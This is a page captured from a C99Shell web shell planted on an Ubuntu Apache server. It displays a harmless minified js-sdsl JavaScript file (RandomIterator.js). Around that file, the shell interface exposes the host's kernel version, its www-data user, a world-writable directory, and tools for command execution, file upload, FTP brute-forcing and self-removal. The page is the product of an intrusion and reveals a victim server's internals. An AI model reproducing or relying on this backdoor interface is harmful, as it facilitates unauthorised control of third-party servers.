!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/pmb/node_modules_old/js-sdsl/dist/esm/container/SequentialContainer/Base/   drwxrwxrwx
Free 13.29 GB of 57.97 GB (22.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RandomIterator.js (2.7 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
var __extends = this && this.t || function() {
    var extendStatics = function(t, r) {
        extendStatics = Object.setPrototypeOf || {
            __proto__: []
        } instanceof Array && function(t, r) {
            t.__proto__ = r;
        } || function(t, r) {
            for (var n in r) if (Object.prototype.hasOwnProperty.call(r, n)) t[n] = r[n];
        };
        return extendStatics(t, r);
    };
    return function(t, r) {
        if (typeof r !== "function" && r !== null) throw new TypeError("Class extends value " + String(r) + " is not a constructor or null");
        extendStatics(t, r);
        function __() {
            this.constructor = t;
        }
        t.prototype = r === null ? Object.create(r) : (__.prototype = r.prototype, new __);
    };
}();

import { ContainerIterator } from "../../ContainerBase";

var RandomIterator = function(t) {
    __extends(RandomIterator, t);
    function RandomIterator(r, n, e, i, o) {
        var a = t.call(this, o) || this;
        a.D = r;
        a.I = n;
        a.g = e;
        a.R = i;
        if (a.iteratorType === 0) {
            a.pre = function() {
                if (this.D === 0) {
                    throw new RangeError("Random iterator access denied!");
                }
                this.D -= 1;
                return this;
            };
            a.next = function() {
                if (this.D === this.I()) {
                    throw new RangeError("Random Iterator access denied!");
                }
                this.D += 1;
                return this;
            };
        } else {
            a.pre = function() {
                if (this.D === this.I() - 1) {
                    throw new RangeError("Random iterator access denied!");
                }
                this.D += 1;
                return this;
            };
            a.next = function() {
                if (this.D === -1) {
                    throw new RangeError("Random iterator access denied!");
                }
                this.D -= 1;
                return this;
            };
        }
        return a;
    }
    Object.defineProperty(RandomIterator.prototype, "pointer", {
        get: function() {
            if (this.D < 0 || this.D > this.I() - 1) {
                throw new RangeError;
            }
            return this.g(this.D);
        },
        set: function(t) {
            if (this.D < 0 || this.D > this.I() - 1) {
                throw new RangeError;
            }
            this.R(this.D, t);
        },
        enumerable: false,
        configurable: true
    });
    RandomIterator.prototype.equals = function(t) {
        return this.D === t.D;
    };
    return RandomIterator;
}(ContainerIterator);

export { RandomIterator };

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--